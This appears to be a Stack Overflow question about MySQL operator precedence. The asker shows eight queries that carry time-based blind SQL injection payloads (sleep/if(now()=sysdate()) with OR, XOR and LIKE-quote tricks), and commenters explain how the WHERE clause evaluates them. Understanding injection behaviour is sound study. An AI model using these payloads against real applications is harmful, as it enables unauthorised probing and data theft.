# What is the execution order of the following SQL statements

Tags: mysql, sql-injection

```
① select id,email,username from member where username='1'or sleep(3)
② select id,email,username from member where username='1'or( if(now()=sysdate(),sleep(3),0))
③ select id,email,username from member where username = '1'XOR if(true,sleep(3),0)
④ select id,email,username from member where username = '1'XOR if(now()=sysdate(),sleep(3),0)
⑤ select id,email,username from member where username like '%0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z%'
⑥ select id,email,username from member where username like '%0'OR(if(now()=sysdate(),sleep(3),0))OR'Z%'
⑦ select id,email,username from member where username like '%0'OR(if(now()=sysdate(),sleep(3),0))OR'Z%'OR 1
⑧ select id,email,username from member where username like '%0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z%'XOR 1
```

i was trying SQL time blind injection,and can't understand the execution logic of the where clause section.

```
①and②，why ② just sleep 3s but ① sleep a long time
④and③，why ② sleep 3s but ③ sleep a long time
⑤⑥⑦⑧，"like"、"XOR" and "or"  execution order
```

i tried the sql in mysql client,but result was Not meeting my expectations

```
Operator Priority：
1   =、:=
2   II、OR
3   XOR
4   &&、AND
5   NOT
6   BETWEEN、CASE、WHEN、THEN、ELSE
7   =、<=>、>=、>、<=、<、<>、!=、 IS、LIKE、REGEXP、IN
8   |
9   &
10  <<、>>
11  -、+
12  *、/、%
13  ^
14  -、〜
15  !
```

Comment: Please format your code as code using the editor. https://meta.stackoverflow.com/questions/251361/how-do-i-format-my-code-blocks

Comment: You're embedding `sleep` in a boolean expression. It is being evaluated to find out if its result is True or False, so the rest of the expression can be evaluated. You can't (ab)use a WHERE clause to be control flow logic. Use actual control flow statements for that ; https://dev.mysql.com/doc/refman/8.0/en/if.html

Comment: @MatBailie You can't use `IF` statements in queries, only in stored procedures.

Comment: [This](https://stackoverflow.com/questions/23824505/does-mysql-eliminate-common-subexpressions-between-select-and-having-group-by-cl) may be related.